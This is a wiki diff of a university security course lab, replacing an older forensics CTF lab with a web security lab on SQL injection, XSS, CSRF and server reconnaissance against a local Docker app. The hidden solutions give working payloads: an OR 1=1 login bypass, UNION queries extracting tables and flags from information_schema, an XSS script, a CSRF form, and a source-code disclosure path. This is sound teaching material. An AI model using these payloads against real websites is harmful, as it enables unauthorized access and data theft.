Differences
This shows you the differences between two versions of the page.
|
isc:labs:09 [2017/05/15 21:19] florin.stancu added feedback task |
isc:labs:09 [2023/12/11 11:42] (current) florin.stancu |
||
|---|---|---|---|
| Line 1: | Line 1: | ||
| - | ====== Lab 09 - Forensics ====== | + | /* ~~SHOWSOLUTION~~ */ |
| - | ===== Overview ===== | + | ====== Lab 09 - Web Security ====== |
| - | Computer forensics is a branch of digital forensic science pertaining to evidence found in computers and digital storage media. The goal of computer forensics is to examine digital media in a forensically sound manner with the aim of identifying, preserving, recovering, analyzing and presenting facts and opinions about the digital information. | + | ===== Objectives ===== |
| + | * Web vulnerabilities, both server-side and client-side | ||
| + | * Server-side SQL injection | ||
| + | * Cross-Site Scripting, Cross-Site Request Forgery | ||
| - | ===== Exercises ===== | + | ===== Background ===== |
| - | ==== [BONUS] Completare formular de feedback ==== | + | ==== SQL Injection ==== |
| - | Vă invităm să evaluați activitatea echipei de ISC și să precizați punctele tari, punctele slabe și sugestiile voastre de îmbunătățire a materiei. Feedback-ul vostru este foarte important pentru noi să creștem calitatea materiei în anii următori și să îmbunătățim materiile pe care le veți face în continuare. | + | SQL Injection is a server-side code injection vulnerability resulting from |
| + | improper (unsanitized) input directly concatenated into SQL queries. | ||
| + | Typical server queries are built as strings: | ||
| + | <code javascript> | ||
| + | sql = "SELECT * FROM table WHERE item = '" + user_input_variable + "' <other expressions>"; | ||
| + | database.query(sql); | ||
| + | </code> | ||
| - | [[http://cs.curs.pub.ro/2016/blocks/feedbackacs/view.php?courseid=147&blockid=3269|Găsiți formularul de feedback aici]]. | + | Note that the user may choose to escape the SQL quotes and alter the SQL statement, e.g.: |
| + | <code javascript> | ||
| + | user_input_variable = "' OR 1=1 -- "; // example input given by the user | ||
| + | sql = "SELECT * FROM table WHERE item = '' OR 1=1 -- ' <other expressions>"; | ||
| + | </code> | ||
| - | Vă mulțumim! | + | An SQL injection exploit ultimately depends on the target SQL expression (which |
| + | is usually unknown to the attacker) and query result behavior (whether the | ||
| + | query contents arem displayed on screen or the user is blind, errors reported | ||
| + | etc.). | ||
| - | -------- | + | **Make sure to check those cheatsheets out:** \\ |
| - | \\ | + | [[https://portswigger.net/web-security/sql-injection]] \\ |
| + | [[https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection]] \\ | ||
| + | and:\\ | ||
| + | [[https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MySQL%20Injection.md]] | ||
| - | You are a private investigator and you have 2h to solve 9 crimes. At the end of every crime you will find a flag that looks like **ISC{...}**. \\ | + | ==== Other server-side vulnerabilities ==== |
| - | Are you up to the task? \\ \\ | + | |
| - | {{:isc:labs:ISC-lab09.zip|Here}} is your data.\\ \\ | + | |
| - | All exercises can be solved on the local Linux machine. | + | |
| - | ==== 00. Capture 1 ==== | + | The SQL injection is a popular server-side code injection vulnerability, but |
| + | there are many mistakes that a website developer / system administrator can | ||
| + | make (//expect to find some of them in your homework :P //): | ||
| - | This is traffic capture of a suspect that we've been following for a long time. Can you find anything interesting like login credentials? | + | * code injection (LDAP, eval, shell execution etc.); |
| - | <spoiler Hint1> | + | * broken authentication or access control (authorization); |
| - | Use wireshark to analyse the pcap. | + | * sensitive data exposure (e.g., backups / keys forgotten inside web root); |
| - | </spoiler> | + | * path traversal; |
| - | <spoiler Hint2> | + | * server misconfiguration; |
| - | Check the ports at statistics/conversations/tcp. | + | * //[[https://owasp.org/www-community/vulnerabilities/|and many more]]// |
| - | </spoiler> | + | |
| - | \\ | + | |
| - | ==== 01. Unknown File Type ==== | + | |
| - | We've found this file on a confiscated machine, but we can't figure what it is. Can you help us? | + | There are even |
| - | <spoiler Hint1> | + | [[https://owasp.org/www-community/Vulnerability_Scanning_Tools|free or |
| - | Today is not your lucky day. No hints for you. | + | commercial web vulnerability scanners]] for testing a server's sercurity! |
| - | </spoiler> | + | |
| - | \\ | + | |
| - | ==== 02. Hidden Flag ==== | + | |
| - | There is something uncanny about this image. Is it trying to give us a hint? | ||
| - | \\ | ||
| - | ==== 03. Corrupted File ==== | ||
| - | During a transmission, one of our files got corrupted. Take a look and see if you can do something about it. | + | ==== Client-side vulnerabilities ==== |
| - | <spoiler Hint1> | + | |
| - | Maybe there is something wrong with the header. | + | |
| - | </spoiler> | + | |
| - | \\ | + | |
| - | ==== 04. Audio Visualization ==== | + | |
| - | We have intercepted an alien transmission, but there is no way to understand what is it saying. Maybe we should look at it. | + | Browsers are now among the most targeted pieces of software on the Internet. |
| - | <spoiler Hint1> | + | This is mainly because of the large threat vector resulting from the complexity of |
| - | Can you SEE it? | + | the web ecosystem, requiring features such as fancy HTML+CSS rendering, |
| - | </spoiler> | + | animation and even sandboxed, untrusted JavaScript code execution. |
| - | \\ | + | |
| - | ==== 05. Hidden File ==== | + | |
| - | There is something wrong with the size of this image. Is there anything else there? | + | Even when the browsers do a good job at protecting against attacks, sometimes |
| - | <spoiler Hint1> | + | trusted websites themselved may contain bugs that directly affect the security |
| - | Use Binwalk. "-e" option is buggy sometimes. | + | of their users. |
| - | </spoiler> | + | |
| - | \\ | + | |
| - | ==== 06. Censored ==== | + | |
| - | We've found a letter in the trash can of a suspect, but some of the info is censored. Do some magic and find what is underneath the black box. | + | A major threat, **Cross Site Scripting (XSS)** is a JavaScript code injection |
| - | <spoiler Hint1> | + | vulnerability where an attacker that found a way to post public HTML scripts |
| - | Use Google. | + | into an unprotected website (e.g., by using comments forms or forum responses). |
| - | </spoiler> | + | Those scripts, if served to other visitors, will execute with the credentials |
| - | \\ | + | of their respective users, making it possible for the attacker to scam, |
| - | ==== 07. Waiting for eternity ==== | + | exfiltrate personal data or even push malware into the victim's PC. |
| - | We stared at this gif for the last hour but nothing is happening. Would you like to join us and stare at it for the next hour? | + | Another typical client-side vulnerability that the web developers need to |
| - | \\ | + | protect their websites against is |
| - | ==== 08. Capture 2 ==== | + | **[[https://research.securitum.com/what-is-the-csrf-cross-site-request-forgery-vulnerability/|Cross-Site |
| + | Request Forgery (CSRF)]]**. | ||
| + | In this attack, the victim is tricked into opening an attacker-controlled web | ||
| + | page which then issues custom requests (either using concealed elements that do | ||
| + | external requests - ''img'', ''form'', or by using JavaScript / AJAX) to | ||
| + | another (target) website. The browser will happily make the requests using the | ||
| + | target domain's cookies and credentials. | ||
| + | If the target website has URLs that execute certain actions (e.g., ''POST | ||
| + | https://my-blog/post.php'') without verifying the source of the request, any | ||
| + | malicious page can execute them. | ||
| + | Note that the attacker cannot see the results of those requests (unless | ||
| + | authorized by CORS headers by the target). | ||
| + | In practice, any URL endpoint executing sensitive actions needs to be protected | ||
| + | using either referer validation or CSRF tokens. | ||
| - | This is an USB capture of a device connected to a suspect's machine. Can you find what he's been typing? | + | ===== Setup ===== |
| - | <spoiler Hint1> | + | |
| - | [[http://www.usb.org/developers/hidpage/Hut1_12v2.pdf|USB Documentation]] | + | |
| - | </spoiler> | + | |
| - | \\ | + | |
| - | ===== Resources ===== | + | |
| - | * Hex Editor | + | |
| - | * Wireshark | + | |
| - | * Binwalk | + | |
| - | * Audacity | + | |
| - | * Image extractor | + | |
| - | * USB documentation | + | |
| + | You will be using a [[https://cloud.grid.pub.ro/|OpenStack VM]] for | ||
| + | your tasks. | ||
| - | <hidden> | + | Remember that the instances have private IPs, ''10.9.x.y'', inaccessible from |
| + | anywhere but the campus network. Since we need to use a local browser to access | ||
| + | a web server running inside the VM, we will employ a SSH tunnelling + proxy | ||
| + | trick to accomplish this. | ||
| - | ====== STUFF FROM SUMMER 2016 ====== | + | You should already have a [[:isc:info:virtualmachine|SSH keypair for authenticating with fep & OpenStack]]: |
| + | We will be using ''ssh''`s Local Port Forwarding feature, requesting it to pass all packets from ''localhost:8080'' through the SSH tunnel to the destination VM on ''8080'': | ||
| + | <code bash> | ||
| + | ssh -L "8080:localhost:8080" -J <first.lastname>@fep.grid.pub.ro student@10.9.X.Y | ||
| + | </code> | ||
| - | TODO!!!! | + | ===== Tasks ===== |
| - | SCHIMBAT IP MASINA VIRTUALA SI MODIFICAT IN DOCUMENT | + | |
| - | Sa caute ultimul fisier modificat din filesystem | + | === 1 [20p]. SQL Injection === |
| - | locatie in QR | + | |
| - | + | ||
| - | Adaugat ceva de mobile?? | + | |
| - | | + | |
| - | + | * Start the web server by using the following sequence: <code bash> | |
| - | ===== Resources ===== | + | # First, start the MySQL instance in background |
| - | + | docker run -d --rm --name mysql ropubisc/lab08-mysql | |
| - | *[[http://downloads.volatilityfoundation.org/releases/2.4/CheatSheet_v2.4.pdf|Volatility Cheatsheet]] | + | # Wait until the MySQL server fully starts: |
| + | docker logs mysql -f | ||
| + | # Ctrl+C and continue when it says: 'mysqld: ready for connections.' | ||
| + | # Finally, start the sample web server | ||
| + | docker run -it --link mysql:mysql -p 8080:8080 ropubisc/lab08-web-server | ||
| + | </code> | ||
| + | * Connect to the application using [[http://localhost:8080/]] (assuming you forwarded the port correctly) | ||
| + | * Now: You don't know any user / password for this website. Try to log in using SQL Injection! | ||
| + | * The most common approach when testing for SQL Injection is to input an apostrophe ("'") in any of the provided fields ([[https://security.stackexchange.com/questions/67972/why-do-testers-often-use-the-single-quote-to-test-for-sql-injection]]) | ||
| + | * Hint: Try the apostrophe in one of the login fields, check if it shows an error! | ||
| + | * Note: After examining the error the form prompts, we can assume how the query is being made: <code sql> | ||
| + | 'SELECT <some columns> FROM users WHERE username = ' + username + ' AND password = ' + password + ' LIMIT 1;' | ||
| + | </code> | ||
| + | * Is pretty obvious that the strings provided are not escaped and we can abuse this misconfiguration. Check the links in the beginning! | ||
| + | * If you ever want to exit the MySQL server:<code> | ||
| + | docker kill mysql | ||
| + | </code> | ||
| - | ===== Overview ===== | + | <solution -hidden> |
| + | Login with ''%%' OR 1=1 -- -%%'' | ||
| + | </solution> | ||
| - | *You are a forensic detective hired to investigate the recent attack on our database server. Fortunately, the security team detected the intrusion in time and the hacker had to run quickly, leaving his laptop in the server room. Using a cold boot attack, we managed to obtain a dump of his ram. Your job is to gather as much intel as you can. | + | === 2 [20p]. Advanced SQL Injection === |
| + | * Start the web server from the first task again. | ||
| + | * What if I told you there is a hidden **flag** inside the database? Find it! | ||
| + | * Hint: where do you have query feedback inside the application? try to do an ''UNION'' hack! | ||
| + | * Note: Since we will be using the same query as the one used in the first exercise, we must first find the exact number of columns provided to the statement. We are aiming at building a query of this format: <code sql> | ||
| + | SELECT col1, col2, ..., colN from users WHERE username ='' UNION SELECT col1, col2, ... , colN-1, desired_column from desired_database_table --;</code> | ||
| + | * Note: for UNION to work, you must SELECT exactly the same number of columns as in the original query! | ||
| + | * After finding out the exact number of columns, we can use ''GROUP_CONCAT'' technique to extract the available database table names.\\ Check out the cheatsheets from the Background section! (P.S. database schema is ''journalapp'') | ||
| + | * Hint: <code>UNION SELECT col1, col2, ... , colN-1, GROUP_CONCAT(<what are we looking for in the schema>) FROM information_schema.tables WHERE table_schema='<our schema name>' </code> \\ It is not necessary to know the exact names of 'col1', 'col2', ... 'colN-1'. You can replace it with numbers or '@'. | ||
| + | * Got any table that catches your eye? We are going to use ''GROUP_CONCAT'' again, but this time we are trying to find the name of the columns of our desired table. | ||
| + | * Hint: <code>UNION SELECT col1, col2, ... , colN-1, GROUP_CONCAT(<what are we looking for in the table>) FROM information_schema.columns WHERE table_name='<our table name>' </code> | ||
| + | * Got the column name? Good. Now it should be nothing more than a simple select query :) | ||
| + | * Hint: <code>UNION SELECT col1, col2, ... , colN-1, <desired column name> FROM <desired table name></code> | ||
| - | <note> | + | <solution -hidden> |
| - | Volatility usage: | + | Find the number of main table columns: ''%%asd' UNION (SELECT 1, 2, 3, 4) -- .%%''\\ |
| + | Find the tables: ''%%' UNION SELECT 1, 2, 3, GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema='journalapp' -- .%%''\\ | ||
| + | Find the columns: ''%%' UNION SELECT 1, 2, 3, GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name='flags' -- .%%''\\ | ||
| + | Find the flag: ''%%' UNION SELECT 1, 2, 3, flag FROM flags -- .%%''\\ | ||
| + | </solution> | ||
| - | volatility-2.5.standalone.exe -f <dump> imageinfo; Look at the suggested profile | + | === 3 [20p]. Cross-Site Scripting === |
| - | volatility-2.5.standalone.exe -f <dump> --profile=<profile> kdbgscan; Look at the Offset (V) | + | * You can still save the day: cover the monster's mouth (you can use the image at ''http://localhost:8080/images/muzzle.png'')! |
| + | * Since HTML is allowed, you can also inject a JavaScript alert, example:<code> | ||
| + | <script>alert("XSS!");</script> | ||
| + | </code> | ||
| + | * **Hint**: You can use absolute element positioning, e.g.: ''<div style=%%"%%position: absolute; top: -300px;left:100px;%%"%%> insert your img here </div>''. Try it with the browser's developer console / inspect element first before injecting it inside a message ;) \\ [[https://www.w3schools.com/css/css_positioning.asp]] | ||
| + | * Hint: Console can be accessed either by right-clicking and choosing Inspect or by hitting F12 on your keyboard and navigating to 'Console' tab. | ||
| + | * Note: Try appending code to the document's body. | ||
| - | volatility-2.5.standalone.exe -f <dump> --profile=<profile> --kdbg=<offset> COMMAND | + | <solution -hidden> |
| - | </note> | + | <code> |
| - | + | <div style="position: absolute; top: -510px; left: 250px"><img src="/images/muzzle.png"></div> | |
| + | <script>alert("No more Shosho, phew!");</script> | ||
| + | </code> | ||
| + | </solution> | ||
| - | <note tip>You should look for processes, commands, files, history, connections and network traffic.</note> | + | === 4 [20p]. Cross-Site Request Forgery === |
| + | * The objective is to fool your victim using an external website (simulated using a local .html page) to post an attacker-controller message into the website. | ||
| + | * On your local station, as the attacker: create a simple HTML page that posts a hidden message to [[http://localhost:8080/journal/post]]; this will be equivalent to hosting a malicious website; | ||
| + | * Hint: Check the HTML of the website for a ''%%<form>%%'' example! | ||
| + | * Hint: Use an input with ''%%type="hidden"%%'' | ||
| + | * Switching sides (you're the victim, now): open that HTML page using your web browser. Click a button and the hidden message will be posted ;) | ||
| + | * (Make sure you are logged in inside the web app before doing the attack!) | ||
| + | * For bonus, you can try to do a cross-site AJAX posting the message automatically (without requiring user interaction!). | ||
| + | <solution -hidden> | ||
| + | <code> | ||
| + | <form action="http://localhost:8080/journal/post" method="post"> | ||
| + | <input type="hidden" name="message" value="I am stupid!"> | ||
| + | <input type="submit" value="Click me!"> | ||
| + | </form> | ||
| + | </code> | ||
| + | </solution> | ||
| - | ==== Solution: ==== | + | === 5 [20p]. Server Reconnaissance === |
| - | volatility-2.5.standalone.exe -f memory.dmp imageinfo | + | * Can you steal the source code of the server-side code using HTTP only? |
| + | * Once you found it, try to find the database credentials! | ||
| + | * Hint: try to guess the path to a [[https://docs.npmjs.com/files/package.json|common file]] that all NodeJS projects have! It may reference the main script's name! | ||
| + | * Also try it by using a tool: [[https://cirt.net/nikto2|nikto]], ''apt install nikto'' | ||
| - | volatility-2.5.standalone.exe -f memory.dmp --profile=Win7SP1x86 kdbgscan | + | <solution -hidden> |
| + | <code> | ||
| + | GET /package.json | ||
| + | it references the main file: | ||
| + | GET /server.js | ||
| + | </code> | ||
| + | </solution> | ||
| - | volatility-2.5.standalone.exe -f memory.dmp --profile=Win7SP1x86 --kdbg=0x82b73c78 pslist > ps.txt | + | === Feedback === |
| - | volatility-2.5.standalone.exe -f memory.dmp --profile=Win7SP1x86 --kdbg=0x82b73c78 cmdline | + | Please take a minute to fill in the [[https://forms.gle/5Lu1mFa63zptk2ox9|feedback form]] for this lab. |
| - | + | ||
| - | volatility-2.5.standalone.exe -f memory.dmp --profile=Win7SP1x86 --kdbg=0x82b73c78 consoles | + | |
| - | + | ||
| - | volatility-2.5.standalone.exe -f memory.dmp --profile=Win7SP1x86 --kdbg=0x82b73c78 dumpfiles -D file > dump.txt | + | |
| - | + | ||
| - | file: file.3640.0x86a44318 | + | |
| - | + | ||
| - | find: "search" | + | |
| - | + | ||
| - | http://www.bing.com/search?q=https%3A%2F%2Fdocs.google.com%2Fdocument%2Fd%2F1KAHXjGIT_8EX0gA5NGZSZ0A-PzcVbzIxm1NKtQClvME%2Fedit%3Fusp%3Dsharing&qs=n&form=QBLH&pq=https%3A%2F%2Fdocs.google.com%2Fdocument%2Fd%2F1kahxjgit_8ex0ga5ngzsz0a-pzcvbzixm1nktqclvme%2Fedit%3Fusp%3Dsharing&sc=0-96&sp=-1&sk=&cvid=32A3046F740B479DA10E524ABD27DB70 | + | |
| - | + | ||
| - | https://docs.google.com/document/d/1KAHXjGIT_8EX0gA5NGZSZ0A-PzcVbzIxm1NKtQClvME/edit | + | |
| - | + | ||
| - | user besthacker | + | |
| - | + | ||
| - | WW91ciBwYXNzd2QgaXM6IENGVFVJQkRMRlM= BASE64decode | + | |
| - | + | ||
| - | Your passwd is: CFTUIBDLFS | + | |
| - | + | ||
| - | ssh besthacker@..... | + | |
| - | + | ||
| - | </hidden> | + | |
